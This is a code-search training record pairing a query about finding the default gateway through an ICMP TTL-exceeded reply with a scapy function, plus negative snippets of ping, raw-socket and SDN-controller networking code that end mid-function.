[ "0.7043539", "0.6484077", "0.64424086", "0.6386618", "0.63455755", "0.6326406", "0.6275683", "0.62598705", "0.6095228", "0.5987131", "0.59356433", "0.58306605", "0.5739227", "0.57313937", "0.5700737", "0.56921375", "0.5688917", "0.5655082", "0.56411165", "0.56379056", "0.56274575", "0.5626001", "0.56183034", "0.56174517", "0.56109244", "0.55871266", "0.5584417", "0.5576894", "0.55734235", "0.5572032", "0.5555485", "0.5535834", "0.55081713", "0.55011475", "0.5480058", "0.5478358", "0.5468336", "0.54563195", "0.54396003", "0.5409106", "0.53962207", "0.5375894", "0.5372092", "0.53657633", "0.5352276", "0.5351779", "0.5346236", "0.53227514", "0.52958226", "0.5288484", "0.5264403", "0.5256296", "0.524922", "0.524199", "0.5241964", "0.52352566", "0.5228903", "0.5228137", "0.52138597", "0.52128637", "0.52080184", "0.5194912", "0.5167124", "0.5164993", "0.5159728", "0.5156408", "0.51518965", "0.51489943", "0.51475686", "0.5133485", "0.5133084", "0.5129621", "0.51287967", "0.51277846", "0.5110069", "0.510741", "0.5103767", "0.5096733", "0.5091971", "0.5085295", "0.50850314", "0.5078336", "0.50782835", "0.5076941", "0.50707746", "0.50650585", "0.5053772", "0.5031197", "0.5030874", "0.5011344", "0.499699", "0.49937946", "0.49873137", "0.49859846", "0.4983199", "0.49817714", "0.4977811", "0.49667922", "0.49648622", "0.49610057", "0.49548438" ]
0.0
-1
Send an echo packet with TTL 0, so that when it arrives at the GW, the GW sends back a TTL-exceeded error (ICMP message); the src of that reply is the GW.
def get_GW():
    p = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=0)
    return p.src
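A minimal, slightly expanded sketch of the same idea, for readability: the probe's TTL expires at the first hop, so the default gateway answers with an ICMP time-exceeded (type 11), and the reply's source address is the gateway's IP. The function name, the timeout argument, the payload length, and the explicit type-11 check are illustrative additions not present in the original snippet; some stacks may need ttl=1 rather than 0 before the first hop answers.

from scapy.all import IP, ICMP, sr1

def get_gateway(probe_dst="google.com", timeout=2):
    # TTL 0 (or 1) expires at the first hop: the default gateway drops the
    # probe and replies with an ICMP time-exceeded sourced from its own IP.
    reply = sr1(IP(dst=probe_dst, ttl=0) / ICMP() / ("X" * 11),
                timeout=timeout, verbose=0)
    if reply is None:
        return None                      # no reply before the timeout
    if reply.haslayer(ICMP) and reply[ICMP].type == 11:
        return reply.src                 # time-exceeded: the sender is the gateway
    return None                          # unexpected reply type

Run as root (raw sockets are required); on a typical home network, print(get_gateway()) should print the default gateway's address.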
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def send_one_ping(mySocket, destIP, myID, mySeqNumber, packet_size):\n \n myChecksum = 0 # contador da soma de verificação\n\n # Faça um cabeçalho fictício com uma soma de verificação 0\n # Retorne uma string contendo os valores compactados de acordo com o formato especificado. \n header = struct.pack(\n \"!BBHHH\", ICMP_ECHO, 0, myChecksum, myID, mySeqNumber\n )\n\n padBytes = []\n startVal = 0x42\n \n for i in range(startVal, startVal + (packet_size-8)):\n padBytes += [(i & 0xff)] # Mantenha os caracteres no intervalo de 0 a 255\n data = bytearray(padBytes)\n\n # Calculo a soma de verificação nos dados e no cabeçalho fictício.\n myChecksum = checksum(header + data) # A soma de verificação está em ordem de rede\n\n # Agora que temos a soma de verificação correta, colocamos isso. \n # É apenas mais fácil, para criar um novo cabeçalho do que colocá-lo no modelo.\n header = struct.pack(\n \"!BBHHH\", ICMP_ECHO, 0, myChecksum, myID, mySeqNumber\n )\n\n # pacotes com a integridade dos dados verificada e com cabeçalho checksum adicionado.\n packet = header + data\n\n sendTime = default_timer() # Essa função retorna o tempo de espera junto com o tempo da CPU e depende da plataforma. \n\n try:\n \"\"\" \n socket.sendto(bytes, address)\n Retornar o número de bytes enviados.\n \"\"\"\n mySocket.sendto(packet, (destIP, 1))\n except socket.error as e:\n print(\"Falha Geral (%s)\" % (e.args[1]))\n return\n\n return sendTime", "def pinger(dst):\n icmpId = 0x4711\n for i in range(MAX_NUM_PROBES):\n # Erzeuge das ICMP Echo Anfrage-Paket (type=8).\n # Der Parameter seq ist ein Zaehler fuer die Anfrage-Pakete.\n icmpPkt = ICMP() # Hier muss ergaenzt werden!\n \"\"\"\n scapy liefert die Klasse ICMP mit der ein ICMP-Paket erzeugt werden kann.\n Es hat die folgenden Felder:\n >>> i = ICMP()\n >>> i.default_fields\n {'addr_mask': '0.0.0.0',\n 'chksum': None,\n 'code': 0,\t\t\t# \n 'gw': '0.0.0.0',\n 'id': 0,\n 'length': 0,\n 'nexthopmtu': 0,\n 'ptr': 0,\n 'reserved': 0,\n 'seq': 0,\n 'ts_ori': 70195301,\n 'ts_rx': 70195301,\n 'ts_tx': 70195301,\n 'type': 8, # echo request\n 'unused': 0}\n\n Ueberlegen Sie, welche Felder Sie beim Erzeugen der ICMP-Instanz mit welchen\n Werten versehen muessen. Die Parameteruebergabe funktioniert mit\n Parametername=Parameterwert, also z.B.:\n ICMP(type=5, code=3, ...)\n \"\"\"\n\n # Nun wird das Anfragepaket erzeugt. Die unterste Schicht, die wir hier angeben muessen \n # ist IP (die Vermittlungsschicht). Um alle Schichten darunter kuemmert sich scapy bzw.\n # das Betriebssystem. \n # Dem IP-Paket geben wir als Ziel-IP-Adresse den Wert der Variable dst an. 
Scapy kuemmert\n # sich automatisch darum, eine passende Quell-IP-Adresse zu verwenden.\n # Die Schichtung von Paketen erfolgt mit Hilfe des Schraegstrich-Operators '/'.\n ipPkt = IP(dst=dst)\n req = ipPkt/icmpPkt\n\n # Gib eine Zusammenfassung des fertigen Pakets aus\n req.show2()\n\n # Die einfachste Art der Implementierung nutzt die Funktion sr() von scapy.\n # Der Name sr() steht dabei fuer `send` und `receive`, also `sende` und `empfange`.\n # Informationen zu sr() finden Sie hier: \n # https://scapy.readthedocs.io/en/latest/usage.html#send-and-receive-packets-sr\n # Warte maximal 5 Sekunden auf eine Antwort (timeout=5).\n ans, unans = sr(req, timeout=5, verbose=0)\n # Gib eine einzeilige Zusammenfassung von Anfrage und Antwort aus\n ans.summary()\n # Warte 0.9 Sekunden bis zur naechsten Iteration\n time.sleep(0.9)", "def atraso(myStats, destIP, hostname, timeout, mySeqNumber, packet_size, quiet=False):\n delay = None\n \n \"\"\"\n socket.AF_INET, é uma string que representa um nome de host na notação de domínio da Internet \n como 'daring.cwi.nl' ou um endereço IPv4 como '100.50.200.5' e porta é um inteiro.\"\"\"\n \"\"\"\n socket.getprotobyname(protocolname), Traduz um nome de protocolo da Internet (por exemplo, 'icmp') \n para uma constante adequada para passar como o terceiro argumento (opcional) \n para a função socket (). Isso geralmente é necessário apenas para soquetes abertos \n no modo \"bruto\" (SOCK_RAW); para os modos normais de soquete, o protocolo correto é \n escolhido automaticamente se o protocolo for omitido ou zero.\n \"\"\"\n\n try: \n mySocket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.getprotobyname(\"icmp\"))\n except socket.error as e:\n print(\"Falhou!!!. (Erro de socket: '%s')\" % e.args[1])\n\n my_ID = os.getpid() & 0xFFFF # retorna a identificação do processo atual.\n\n sentTime = send_one_ping(mySocket, destIP, my_ID, mySeqNumber, packet_size) # retorna o tempo enviado\n if sentTime == None:\n mySocket.close()\n return delay\n\n myStats.pktsSent += 1 # contador de pacotes enviados\n\n # retorna o tempo de resposta, o tamanho dado, o ping pingado, o numero de seq, id e timeout \n recvTime, dataSize, iphSrcIP, icmpSeqNumber, iphTTL = receive_one_ping(\n mySocket, my_ID, timeout) \n mySocket.close()\n\n if recvTime: # tempo de resposta for verdadeiro\n delay = (recvTime-sentTime)*1000 # tempo de resposta - tempo de envio = delay(ms)\n if not quiet:\n # exibição das respostas do ping\n responseServer = {'bytes': dataSize, 'ip': socket.inet_ntoa(struct.pack(\"!I\", iphSrcIP)), 'sequencia': icmpSeqNumber, 'ttl': iphTTL, 'tempo': round(delay,2)}\n listResponse.append(responseServer)\n\n\n myStats.pktsRcvd += 1 # contador de pacotes recebidos\n myStats.totTime += delay # contador do tempo total (todos os times desse host) \n if myStats.minTime > delay:\n myStats.minTime = delay # contador tempo mínimo\n if myStats.maxTime < delay: \n myStats.maxTime = delay # contador tempo máximo\n else:\n delay = None\n print(\"Requesição excedeu o tempo limite.\")\n\n return delay", "def do_one(dest_addr, timeout, icmp = 1):\n try:\n my_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)\n except socket.error as e:\n if e.errno == 1:\n # Operation not permitted\n e.msg = e.msg + (\n \" - Note that ICMP messages can only be sent from processes\"\n \" running as root.\"\n )\n raise socket.error(e.msg)\n raise # raise the original error\n\n my_id = os.getpid() & 0xFFFF\n\n send_one_ping(my_socket, dest_addr, my_id)\n delay = receive_one_ping(my_socket, 
my_id, timeout)\n\n my_socket.close()\n return delay", "def do_one(dest_addr, timeout):\n icmp = socket.getprotobyname(\"icmp\")\n try:\n my_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)\n except socket.error, (errno, msg):\n if errno == 1:\n # Operation not permitted\n msg = msg + (\n \" - Note that ICMP messages can only be sent from processes\"\n \" running as root.\"\n )\n raise socket.error(msg)\n raise # raise the original error\n \n my_ID = os.getpid() & 0xFFFF\n \n send_one_ping(my_socket, dest_addr, my_ID)\n delay = receive_one_ping(my_socket, my_ID, timeout)\n \n my_socket.close()\n return delay", "def send_ttl_expire(s, in_eth, in_ip, payload):\n saddr = ttl2ip(in_ip.ttl, in_ip.daddr)\n\n eth = ethhdr(in_eth.h_source, in_eth.h_dest, in_eth.h_proto)\n ip = iphdr(\n version=4,\n ihl=5,\n id=in_ip.id,\n ttl=64,\n protocol=1,\n saddr=saddr,\n daddr=in_ip.saddr,\n )\n icmp = icmphdr(11, 0, 0, 0, 0)\n\n ip.tot_len = len(ip) + len(icmp) + len(payload)\n ip.check = checksum(bytearray(ip))\n icmp.checksum = checksum(bytearray(icmp) + payload)\n\n msg = create_string_buffer(len(eth) + len(ip) + len(icmp) + len(payload))\n msg = bytearray(eth) + bytearray(ip) + bytearray(icmp) + payload\n\n print(\n \" %16s <- %16s ttl:%03d proto:%-3d icmp type:%-3d code:%-3d\"\n % (ip.daddr, ip.saddr, ip.ttl, ip.protocol, icmp.type, icmp.code)\n )\n s.send(msg)", "def reply_icmp(self, datapath, srcMac, dstMac, srcIp, dstIp, ttl, type, id,\n seq, data, inPort):\n\n router_port = self.get_router_port_by_gateway_ip(datapath.id, dstIp)\n if router_port:\n # dstIp is the IP of one of the router ports\n # -> replay\n # data already available\n send_src_mac = dstMac\n send_dst_mac = srcMac\n send_src_ip = dstIp\n send_dst_ip = srcIp\n send_port = inPort\n self.send_icmp(datapath, send_src_mac, send_src_ip, send_dst_mac,\n send_dst_ip, send_port, seq, data, id, 0, ttl)\n LOG.debug(\"send icmp echo reply %s => %s (port%d)\"\n % (send_src_mac, send_dst_mac, send_port))\n\n else:\n # if in own net.\n matching_port = self.get_port_by_ip(datapath, dstIp)\n if matching_port:\n # send ARP request opcode =1\n # A flow rule is created when receiving the arp reply from client\n # self.send_arp(datapath, 1, matching_port.mac, str(matching_port.gateway_ip), \"00:00:00:00:00:00\", dstIp,\n # int(matching_port.port_no))\n pass\n else:\n print (\"Forward ICMP to matching network\")\n out_port, new_src_mac, new_dst_mac = self.get_next_hop(dpid=datapath.id, dstIP=dstIp)\n if out_port and new_dst_mac and new_dst_mac:\n self.add_flow_gateway_for_ip(datapath, int(out_port), dstIp, new_src_mac, new_dst_mac)\n # self.add_flow_gateway(datapath,ether.ETH_TYPE_IP, new_src_mac,new_dst_mac,int(out_port),dstIp)\n\n return 0", "def _icmp_send(dp, port_out, ip_src=DISCOVERY_IP_SRC, ip_dst=DISCOVERY_IP_DST,\n eth_src='02:b0:00:00:00:b5', eth_dst='02:bb:bb:bb:bb:bb',\n icmp_type=8, icmp_code=0):\n\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n pkt = packet.Packet()\n pkt.add_protocol(ethernet.ethernet(ethertype=0x0800,\n dst=eth_dst,\n src=eth_src))\n\n pkt.add_protocol(ipv4.ipv4(dst=ip_dst,\n src=ip_src,\n proto=1))\n\n ##Latency measurement\n my_clock = str(time.clock())\n\n ##TODO: Rework payload and codes to properly work with Fragmentation needed\n pkt.add_protocol(icmp.icmp(type_=icmp_type,\n code=icmp_code,\n csum=0,\n data=icmp.echo(1,1,\"{'dpid' : \"+str(dp.id)+\",'port_out' : \"+str(port_out)+\",'clock' : \"+my_clock+\"}\")))\n pkt.serialize()\n data=pkt.data\n actions=[parser.OFPActionOutput(port_out,0)]\n 
out=parser.OFPPacketOut(datapath=dp, buffer_id=ofp.OFP_NO_BUFFER, in_port=ofp.OFPP_CONTROLLER, actions=actions, data=data)\n ##LOG.debug('***ICMP DEBUG*** Sending ICMP with Payload: ' + \"{'dpid' : \"+str(dp.id)+\",'port_out' : \"+str(port_out)+\",'clock' : \"+my_clock+\"}\" )\n dp.send_msg(out)", "def scapy_create_send_ICMP(self, ipdst):\n ip_header = self.define_ip_header(dst=ipdst)\n icmp_header = self.define_icmp_header()\n send(ip_header/icmp_header, count = DEFAULT_PACKET_DURATION)", "def send_ping(self, seq_num):\n # Create a client socket, bind to random port, and set timeout of sock\n client_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n rand_port = random.randint(1024, 65535)\n host = socket.gethostbyname(socket.gethostname())\n client_sock.bind((host, rand_port))\n client_sock.settimeout(self.timeout)\n\n # If first request, print relevant message\n if seq_num == 1:\n print(f'PING {self.server_ip}')\n # Try - send ping request to server\n try:\n # build request message\n request_msg = self.build_message(seq_num)\n\n # Mark start time for calculating request message rtt (ms)\n start_time = time.time() * 1000\n # Send echo request message to server and receive any reply\n client_sock.sendto(request_msg, (self.server_ip, self.server_port))\n data, address = client_sock.recvfrom(2048)\n # Mark end time for calculating rtt (ms)\n end_time = time.time() * 1000\n\n # Add rtt to list of rtts\n rtt = int(end_time - start_time)\n self.rtt_list.append(rtt)\n # Increment request count since transmitted another message\n self.request_count += 1\n\n # Calculate checksum from server\n server_checksum = self.calculate_checksum(data)\n # Grab sequence number from reply message\n server_seq_num = int.from_bytes(data[6:8], byteorder='big')\n\n # If checksum from server reply is invalid, print error message\n # (invalid if sum of headers not = 65535 (all 1's in binary))\n if server_checksum != 65535:\n print(f'WARNING: checksum verification failure for echo reply '\n f'seqno={str(server_seq_num)}')\n # Otherwise print PONG\n else:\n print(f'PONG {self.server_ip}: seq={str(server_seq_num)} '\n f'time={rtt} ms')\n # Successfully received a reply\n self.reply_count += 1\n client_sock.close()\n\n # If have timeout exception, count as dropped\n except socket.timeout:\n self.request_count += 1\n client_sock.close()", "def send_echo_reply(s, in_eth, in_ip, payload):\n eth = ethhdr(in_eth.h_source, in_eth.h_dest, in_eth.h_proto)\n ip = iphdr(\n version=4,\n ihl=in_ip.ihl,\n id=in_ip.id,\n ttl=64,\n protocol=1,\n saddr=in_ip.daddr,\n daddr=in_ip.saddr,\n )\n ipopts = payload[0 : ip.ihl * 4 - len(ip)]\n icmp = icmphdr.from_buffer_copy(payload[len(ipopts) :])\n\n icmp.type = 0\n icmp.code = 0\n icmp.checksum = 0\n\n payload = payload[len(ipopts) + len(icmp) :]\n ip.tot_len = len(ip) + len(ipopts) + len(icmp) + len(payload)\n ip.check = checksum(bytearray(ip) + bytearray(ipopts))\n icmp.checksum = checksum(bytearray(icmp) + payload)\n\n msg = create_string_buffer(\n len(eth) + len(ip) + len(ipopts) + len(icmp) + len(payload)\n )\n msg = bytearray(eth) + bytearray(ip) + bytearray(ipopts) + bytearray(icmp) + payload\n\n print(\n \" %16s <- %16s ttl:%03d proto:%-3d icmp type:%-3d code:%-3d\"\n % (ip.daddr, ip.saddr, ip.ttl, ip.protocol, icmp.type, icmp.code)\n )\n s.send(msg)", "def do(self):\n from sys import exc_info\n try: # One could use UDP here, but it's obscure\n current_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.getprotobyname(\"icmp\"))\n except socket.error, (errno, 
msg):\n if errno == 1:\n # Operation not permitted - Add more information to traceback\n etype, evalue, etb = exc_info()\n evalue = etype(\n \"%s - Note that ICMP messages can only be send from processes running as root.\" % evalue\n )\n raise etype, evalue, etb\n raise # raise the original error\n self.seq_number += 1\n send_time = self.send_one_ping(current_socket)\n if send_time == None:\n return\n\n receive_time, packet_size, ip, ip_header, icmp_header = self.receive_one_ping(current_socket)\n current_socket.close()\n\n if receive_time:\n return (receive_time - send_time) * 1000.0", "def send_error(self, conn, msg):\n # dst ip becomes src ip to return the message\n\n # src ip becomes this ip\n\n # type becomes \"no route\"\n\n # msg is empty\n\n # send from port incoming...current dst ip?\n\n # TODO\n\n return", "def ping(cmd, *args, **argv):\n import os\n context = argv[\"context\"]\n \n def count(num):\n if str(num) == str(int(num)):\n if num < 0:\n context.write(\"%s: bad number of packets to transmit.\" % cmd)\n else:\n return num\n else:\n context.write(\"%s: can't set unicast time-to-live: Unknown host\" % cmd)\n return\n\n ping_p = {\"-c\":count}\n\n def isipaddress(ip):\n import socket\n try:\n ipa = socket.gethostbyname(ip)\n return ipa\n except:\n context.write(\"ping: unknown host %s\" % ip)\n return None\n\n def doping(cmd, sign, sign_param, ipaddress):\n if sign in ping_p.keys():\n # #\n pass\n else:\n context.write(\"connect: Unknown host\")\n return \n \n\tif ping_p[sign](sign_param):\n # #\n pass\n else:\n return \n if isipaddress(ipaddress):\n ip = isipaddress(ipaddress)\n else:\n return\n try:\n os.system(str(cmd) + \" \" + str(sign) + \" \" + str(sign_param) + \" \" + str(ip))\n except:\n context.write(\"has some errors in ping command\")\n return \n\n length = len(args)\n \n if length == 0:\n helpinfo = context.resolver.get_func_doc(getattr(context.resolver.get_module(cmd), cmd))\n helpinfo_format = helpinfo[\"format\"].rstrip()\n helpinfo_format = helpinfo_format.lstrip()\n if helpinfo_format == \"\":\n return\n context.write(helpinfo_format)\n\n elif length < 3:\n cmd_real = context.resolver.has_command(args[0], cmd)\n if cmd_real != None:\n cmds = cmd.split()\n cmd_n = \"_\".join(cmds)\n modulename = cmd_n + \"_\" + cmd_real\n module = context.resolver.get_module(modulename)\n func = getattr(module, modulename)\n func(cmd + \" \" + cmd_real, context = context)\n else:\n doping(cmd, \"-c\", 4, args[0])\n\n else:\n\tif args[1] == \"0\":\n\t os.system(str(cmd) + \" \" + str(args[2]))\n\telse:\n doping(cmd, args[0], args[1], args[2])", "def spoof_packet(packet):", "def receive_one_ping(self, current_socket):\n import select\n from struct import pack, unpack\n\n class HeaderInformation(dict):\n \"\"\" Simple storage received IP and ICMP header informations \"\"\"\n def __init__(self, names, struct_format, data):\n unpacked_data = unpack(struct_format, data)\n dict.__init__(self, dict(zip(names, unpacked_data)))\n\n ICMP_MAX_RECV = 2048 # Max size of incoming buffer\n timeout = self.timeout / 1000.0\n\n while True: # Loop while waiting for packet or timeou+t\n select_start = self.timer()\n inputready, outputready, exceptready = select.select([current_socket], [], [], timeout)\n select_duration = (self.timer() - select_start)\n if inputready == []: # timeout\n return None, 0, 0, 0, 0\n\n receive_time = self.timer()\n\n packet_data, address = current_socket.recvfrom(ICMP_MAX_RECV)\n\n icmp_header = HeaderInformation(\n names=[\n \"type\", \"code\", \"checksum\",\n 
\"packet_id\", \"seq_number\"\n ],\n struct_format=\"!BBHHH\",\n data=packet_data[20:28]\n )\n\n if icmp_header[\"packet_id\"] == self.own_id: # Our packet\n ip_header = HeaderInformation(\n names=[\n \"version\", \"type\", \"length\",\n \"id\", \"flags\", \"ttl\", \"protocol\",\n \"checksum\", \"src_ip\", \"dest_ip\"\n ],\n struct_format=\"!BBHHHBBHII\",\n data=packet_data[:20]\n )\n packet_size = len(packet_data) - 28\n ip = socket.inet_ntoa(pack(\"!I\", ip_header[\"src_ip\"]))\n # XXX: Why not ip = address[0] ???\n return receive_time, packet_size, ip, ip_header, icmp_header\n\n timeout = timeout - select_duration\n if timeout <= 0:\n return None, 0, 0, 0, 0", "def send_error(self, conn, msg):\n #print(\"THIS IS CONNNNNNNNNNNNNNNNNNNN\", conn.getsockname(), conn.getpeername()) \n usIP = conn.getpeername()[:-1] + \"1\" \n #print(usIP) \n no_route = {\"src\": usIP, \"dst\": msg[\"src\"], \"type\": \"no route\", \"msg\": {}}\n conn.send(json.dumps(no_route).encode(\"ascii\"))\n return", "def test_nmap_icmp_echo_request(self):\n assert_equal(self.test_nmap.ICMP_ECHO_REQUEST, 8)", "def _packet_in(self, ev):\n\n dp = ev.msg.datapath\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n match = ev.msg.match\n\n ##SNDCP packet with multiple fragments recieved - print warning, send ICMP fragmentation needed\n ##TODO: Not WOrking correctly\n ## File \"/usr/local/lib/python2.7/dist-packages/ryu/ofproto/ofproto_v1_3_parser.py\", line 746, in __getitem__\n ## return dict(self._fields2)[key]\n ## KeyError: 'udp_dst'\n\n # if (match['eth_type'] == 0x0800 and match['ip_proto'] == inet.IPPROTO_UDP\n # and match['udp_dst'] == VGSN_PORT and match['sndcp_first_segment'] == 1\n # and match['sndcp_more_segments'] == 1):\n # _icmp_send(dp,match['in_port'],match['ipv4_dst'],match['ipv4_src'],match['eth_dst'],match['eth_src'],icmp_type=3,icmp_code=4)\n # LOG.warning('WARNING: Device with IP: '+match['ipv4_src']+' sent fragmented sndcp packet')\n # return\n\n ##ARP request recieved - send 'I'm here' response\n if match['eth_type'] == 0x0806 and match['arp_op'] == 1:\n LOG.debug(\"ARP request accepted\")\n _arp_send(dp=dp, port_out=match['in_port'], arp_code=2, eth_dst=match['eth_src'], eth_target=match['arp_sha'],\n ip_target=match['arp_spa'], ip_sender=match['arp_tpa'])\n LOG.debug('Reply to '+match['arp_spa'] +': Host '+match['arp_tpa']+' is at forwarder '+str(dp.id) + \" with ethX source MAC address\")\n return\n\n ##ARP response with target_ip==DISCOVERY_ARP_IP recieved - we found APN\n #\n # FIXED: All ARP responses are replied, regardless of the target IP\n #\n # TODO : At this point only ARPs belonging to the APNs networks subnet should\n # be answered\n if match['eth_type'] == 0x0806 and match['arp_op'] == 2:\n LOG.debug('TUNNEL MNGR: ARP response with target APN discovery IP recieved at controller, processing for APN extraction')\n pkt = packet.Packet(array.array('B', ev.msg.data))\n arp_pkt=pkt.get_protocol(arp.arp)\n apn_ip = arp_pkt.src_ip\n apn_mac= arp_pkt.src_mac\n port = match['in_port']\n\n ##Search for apn in APN_POOL to add mac addr. 
and update topology\n for sApn in APN_POOL:\n if sApn.ip_addr == apn_ip:\n LOG.debug('Recieved ARP response was from ' + sApn.name + ' APN')\n sApn.eth_addr = apn_mac\n sApn.port = port\n sApn.dpid = dp.id\n # Links towards APNs will not be measured\n topo.add_link(dp.id,str(sApn.name),port)\n topo.add_link(str(sApn.name),dp.id,0)\n topo.reload_topology()\n LOG.debug('TUNNEL MNGR: APN '+str(sApn.name)+' found at forwarder: '+str(dp.id)+', port: '+str(port) + ' by ARP search')\n\n ##Add special rules to edge forwarder\n self.on_edge_inet_dp_join(dp, port, sApn)\n\n # FIX: We do not handle bss as a special APN\n # For greater extensibility, BSS/UTRAN/LAN APNs (exit/enter) points\n # will be handled in a generic manner\n #\n ##Create MAC-tunnels between APN and all BSSs\n #for bss in BSS_POOL:\n # self.add_tunnel(bss,apn)\n #break\n\n ### WMNC: In this case, we are not making tunnels between\n # two types of ingress/egress point, but actually same type\n\n for dApn in APN_POOL:\n # we are cycling through all possible APNs, looking for different APN tupples\n # with filled HW addresses (already found by APN search)\n if sApn != dApn and dApn.eth_addr != None:\n LOG.debug('TUNNEL MNGR: Different APNs with filled HW address found, lets find out if there is tunnel between them')\n\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('TUNNEL MNGR: No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next APN discovered.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n\n\n return\n\n ##ICMP echo with dst_ip==DISCOVERY_IP_DST recieved - new link between forwarders is up\n if match['eth_type'] == 0x0800 and match['ipv4_dst'] == DISCOVERY_IP_DST and match['ip_proto'] == 1:\n #LOG.debug('TOPO MNGR: ICMP echo recieved at controller, processing for link extraction or latency measurement')\n\n pkt = packet.Packet(array.array('B', ev.msg.data))\n\n ##Discovery pings carry information about sending datapath in payload of icmp packet\n ##these information are in Dictionary format, we parse the out with _icmp_parse_payload() method\n body = _icmp_parse_payload(pkt)\n neighbourDPID=body['dpid']\n neighbourPort=body['port_out']\n\n ## measurement\n ## currentClock moved way up to improve precision\n receivedClock=float(body['clock'])\n currentClock = time.clock()\n latency = currentClock - receivedClock\n\n currentDate = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n ##Update latency or add new edges to topology.\n if topo.DynamicGraph.has_edge(dp.id, neighbourDPID) and topo.DynamicGraph.has_edge(neighbourDPID, dp.id):\n topo.StaticGraph[neighbourDPID][dp.id]['pdv'] = topo.StaticGraph[neighbourDPID][dp.id]['lat'] - latency\n topo.StaticGraph[neighbourDPID][dp.id]['lat'] = latency\n topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n #topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n loss = self.loss_update(neighbourDPID, dp.id, currentDate)\n #LOG.debug('TOPO MNGR: Updating latency ' + str(latency) + ' and date ' + str(currentDate) + ' LOSS: ' + str(loss))\n topo.reload_topology()\n else:\n ## latency not correct for both directions when adding links\n ## update occurs on receive of next 
measurement packet from oposite direction\n topo.add_link(dp.id, neighbourDPID, ev.msg.match['in_port'], latency, currentDate)\n topo.add_link(neighbourDPID, dp.id, neighbourPort , latency, currentDate)\n LOG.debug('TOPO MNGR: Topology changed: New link between forwarder ID '+str(dp.id)+ ' via port ' + str(ev.msg.match['in_port'])\n +' and forwarder ID '+str(neighbourDPID)+ ' via port ' + str(neighbourPort) + ' was discovered.')\n\n topo.reload_topology()\n ## retry to create tunnels\n ## find better paths between APNs\n for sApn in APN_POOL:\n for dApn in APN_POOL:\n if sApn != dApn:\n LOG.debug('TOPO MNGR: Topology changed: trying to re-build inactive tunnel between:' + sApn.name + ' and ' + dApn.name)\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next fwd connects.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n return\n\n # flow of last resort (process for routing)\n if match['eth_type'] == 0x0800:\n # LOG.debug('*****************Flow of last resort matched(plain IP), process for routing********'\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'] + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp'])))\n ## Not very proud of myself, but it will do the trick\n ## Turbo lumberjack routing logic\n ## TODO: Implement a longest prefix match routing\n\n candidates = []\n\n for source, destination, ip_dscp in routesList:\n if ((source == match['ipv4_dst'] and destination == match['ipv4_src']) or (source == match['ipv4_src'] and destination == match['ipv4_dst'])) and ip_dscp == match['ip_dscp']:\n # LOG.debug('ROUTING: route source: ' + str(source) + 'destination: ' + str(destination)\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'])\n # + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(ip_dscp)\n # + ' already exists, aborting addition of new route')\n return\n\n for tunnel in TUNNELS:\n if (tunnel.sApn.ip_addr == match['ipv4_dst'] and tunnel.dApn.ip_addr == match['ipv4_src']) or (tunnel.sApn.ip_addr == match['ipv4_src'] and tunnel.dApn.ip_addr == match['ipv4_dst']):\n LOG.debug('ROUTING: Tunnel candidate found in list of tunnels. 
Adding tunnel path: ' + str(tunnel.po_edges) + ' to candidates.')\n candidates.append(tunnel)\n\n trafficClass = self.TC_selection(match['ip_dscp'])\n\n if len(candidates) == 0:\n LOG.debug('ROUTING: match[ipv4_dst]: ' + str(match['ipv4_dst'])\n + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp']))\n LOG.debug('ROUTING: ERROR, NO feasible tunnels for such route.')\n return\n\n LOG.debug('Looking for tunnels: DST_IP: ' + match['ipv4_dst'] + ' SRC_IP: ' + match['ipv4_src'] + ' DSCP: ' + str(match['ip_dscp']) + '(traffic class: ' + str(trafficClass) + ')' + ' Incoming from FWD: ' + str(dp.id))\n tunnel = self.tunnel_selection(trafficClass, candidates)\n LOG.debug('TE MNGR: Selected tunnel Path out: ' + str(tunnel.path_out_str) + ' meter_id: ' + str(tunnel.meter_id))\n\n dscp = match['ip_dscp']\n\n ## meter_id\n ## 2,4,6,8,10 = 500kbps, 1,3,5,7,9 = 1000kbps ...\n ## 0 = 100Gbps\n meter_id = tunnel.meter_id\n\n #\n # FIXME: incomplete set of rules installed on LAN Access forwarders\n # TODO : Philosophy of table IDs should be clarified, as now it total mess!!!\n # TODO : this should be done only once, from that moment, all user plane packets\n # should travelse only forwarder and should not be sent to controller\n\n\n\n #WAY OUT\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch 